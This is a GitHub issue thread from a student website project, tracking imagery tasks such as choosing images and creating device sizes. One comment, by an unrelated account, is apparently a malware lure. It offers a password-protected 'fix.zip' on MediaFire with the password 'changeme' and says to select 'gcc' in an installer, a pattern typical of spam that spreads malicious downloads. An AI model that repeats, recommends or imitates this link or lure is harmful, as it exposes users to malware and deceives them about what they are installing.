### ISSUE TITLE
Imagery

### ISSUE THREAD

**Issue by Jereriviel** [Jereriviel/semester-project-1#21]
- [x] Choose images and create a image overview in Figma.
- [x] Download images not provided by the client.
- [x] Create an image folder to be used for the website.
- [x] Create different sizes for different devices.
- [x] Create a Young Stars Club banner.

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Jereriviel** [comment]
Extra images downloaded from Unsplash and Adobe Stock.
